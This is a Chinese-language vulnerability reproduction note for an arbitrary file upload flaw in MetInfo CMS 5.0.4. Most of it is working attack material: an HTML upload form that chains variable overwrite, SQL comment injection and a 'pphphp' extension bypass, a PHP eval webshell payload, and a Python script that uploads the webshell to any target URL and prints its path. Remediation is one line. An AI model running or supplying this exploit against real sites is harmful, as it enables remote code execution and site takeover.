metinfo_5.0.4_file-upload
漏洞描述
MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞。
漏洞危害等级
高危
影响版本
5.0.4
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | Windows 2008 R2 x64 |
Web Server | phpStudy 2016(特别版) |
Source Code | MetInfoV5.0.4 |
漏洞演示
- 本地构造HTML 表单,进行文件上传
- 变量覆盖,SQL注入(# %23),双写绕过。
<html>
<form enctype="multipart/form-data" method="post"
name="myForm"
action="http://localhost/metinfov504/admin/include/uploadify.php? metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_a
dmin_table%23&type=upfile&met_file_format=jpg|pphphp"
>
<input name="Filedata" type="file" size=20>
<input type="submit" name="Submit" value="submit">
</form>
</html>
- 直接访问html文件,上传文件,上传成功
../upload/file/1606873883.php
- WebShell 地址
http://host-3/html/MetInfo5.0.4/upload/file/1606873883.php
- 蚁剑连接
深度利用
python脚本自动化
import requests
import sys
'''
MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞。
<html>
<form enctype="multipart/form-data"
method="post"
name="myForm"
action="http://localhost/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
>
<input name="Filedata" type="file" size=20>
<input type="submit" name="Submit" value="submit">
</form>
</html>
'''
url = sys.argv[1]
#url = "http://host-3/html/MetInfo5.0.4/"
fullUrl = url + "admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
payload = "<?=@eval($_REQUEST[buzhidao])?>"
files = {'Filedata':('404.php',payload,'image/png')}
data = {'Submit':'submit'}
res = requests.post(url = fullUrl,files = files, data=data)
shellPath = res.text[4:]
shellPath = url + shellPath
print(shellPath)
漏洞修复
- 更新到最新版本